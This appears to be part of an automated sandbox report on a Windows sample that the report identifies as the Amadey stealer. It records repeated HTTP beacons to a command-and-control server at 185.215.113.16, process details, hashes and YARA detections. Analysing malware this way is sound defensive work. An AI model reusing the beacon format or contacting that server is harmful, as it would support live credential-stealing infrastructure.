                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:50.400048018 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.553686185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:50.516756058 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:51.277060032 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:51.277800083 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:51.527635098 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.553687185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:51.640239000 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:52.413220882 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:52.415894032 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:52.675721884 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      41192.168.2.553688185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:52.797126055 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:53.648627043 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:53.649533033 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:53.899780035 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.553689185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:54.031814098 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:54.834448099 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:54.835484982 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:55.089221001 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.553690185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:55.202594042 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:55.991609097 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:55.992436886 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:56.243362904 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      44192.168.2.553691185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:56.359525919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:57.111125946 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:57.127521038 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:57.378264904 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      45192.168.2.553692185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:57.498933077 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:58.280455112 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:58.283097982 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:58.617841959 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      46192.168.2.553693185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:59.146281958 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:59.912614107 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:07:42:53
                      Start date:26/07/2024
                      Path:C:\Users\user\Desktop\EXyAlLKIck.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\EXyAlLKIck.exe"
                      Imagebase:0x750000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2014529476.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2054954455.0000000000751000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:07:42:56
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Imagebase:0x6a0000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2085097235.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2044771326.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:3
                      Start time:07:42:56
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                      Imagebase:0x6a0000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2045418136.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2085839344.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:7
                      Start time:07:44:00
                      Start date:26/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Imagebase:0x6a0000
                      File size:1'878'528 bytes
                      MD5 hash:FDDCF49860999A5147F34179C07C4BC6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2671343641.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Disassembly

                      Reset < >

                        Executed Functions

                        Function 05130B6A Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1447036e8726f2368d8309e43aa8cfce52b611ab531540d46a97acfcce73d57f
                        • Instruction ID: c4df0756f8cb9c40ed4475e5168963343b11bfaa832f74ea54092acd10ae48eb
                        • Opcode Fuzzy Hash: 1447036e8726f2368d8309e43aa8cfce52b611ab531540d46a97acfcce73d57f
                        • Instruction Fuzzy Hash: 0311C07510C214AFD31B8A604AAD5F53FD6BECB3307324DF5F403C791AD391451AA122
                        Function 05130BC8 Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4d8b8a10f5bb3133eb4a7a229cffddfcf2fa75ee8a29e650a4af12a24511077
                        • Instruction ID: d3858bd23271321e0a0c7a3bb5dbee3a2e6ada6ffa78c0ec38741f7c3e3327c2
                        • Opcode Fuzzy Hash: d4d8b8a10f5bb3133eb4a7a229cffddfcf2fa75ee8a29e650a4af12a24511077
                        • Instruction Fuzzy Hash: 9F01C95160C351AFD72B867086AE1B03FC36F0B130B328DE0E443DB223E765850B5243
                        Function 05130BB6 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 738d3de220b6db4348af5fdd653e0dc5afaab605c945cbceedaff7c449c268d6
                        • Instruction ID: 12d8056c6ce1e08245c402a001402ee865b90020e4b88abc45a002baee6acfff
                        • Opcode Fuzzy Hash: 738d3de220b6db4348af5fdd653e0dc5afaab605c945cbceedaff7c449c268d6
                        • Instruction Fuzzy Hash: 15019C6520C315BFD36B85A046AE5713FD3AE4F1307318DF5E803D6612E761490A51A2
                        Function 05130C75 Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dba67dc1065a64fe099850d6f9ba871bbde553abf9510beba99c74fa8a360a0
                        • Instruction ID: 544c654b518c2793d120244135a8dc7bd5690bc2314091366ec3ac5c74126400
                        • Opcode Fuzzy Hash: 1dba67dc1065a64fe099850d6f9ba871bbde553abf9510beba99c74fa8a360a0
                        • Instruction Fuzzy Hash: 6901685110E291DECB1B92B585FD1E13FE23E0F1203354DEAC093CA573E751914BD686
                        Function 05130BE0 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e7899a05f4543ff7775bc33360244f259040aca3bc2d8aabeedc99ce921c757
                        • Instruction ID: fc326811f8a4804a27f0de72dc30cb84d9d533d944a9cbd115c71b0f56005626
                        • Opcode Fuzzy Hash: 7e7899a05f4543ff7775bc33360244f259040aca3bc2d8aabeedc99ce921c757
                        • Instruction Fuzzy Hash: ED019760108305AFC32B86B0CAAE1A57FD37F0F160B318EE0A953D72A3E7A085469582
                        Function 05130C5D Relevance: .1, Instructions: 51COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df13dc7ba490f3893a1af6736794b18d835e037be1ee0e1f89e59d94244ca0c3
                        • Instruction ID: ee5c504ee6593542d80da9fd440132f657fe042a6fe051daf3f2a4a989f6403a
                        • Opcode Fuzzy Hash: df13dc7ba490f3893a1af6736794b18d835e037be1ee0e1f89e59d94244ca0c3
                        • Instruction Fuzzy Hash: 2AF0D814108205AFC76B82B482FE2B13FD33F0F131B314EE0A41392522FBA1864A6582
                        Function 05130C0B Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02ddda144400a80e136390596b3140af7fa6999377a8400df34336cd7263cee7
                        • Instruction ID: 6461932e75d6edf53ee1f7a4b9359221d220131dba6fee65e1f6c4f181b52a92
                        • Opcode Fuzzy Hash: 02ddda144400a80e136390596b3140af7fa6999377a8400df34336cd7263cee7
                        • Instruction Fuzzy Hash: A4017B61508341AFC75786B085ED0A13FF27F0B120B3549E4D8D397122E76095169A52
                        Function 05130C31 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
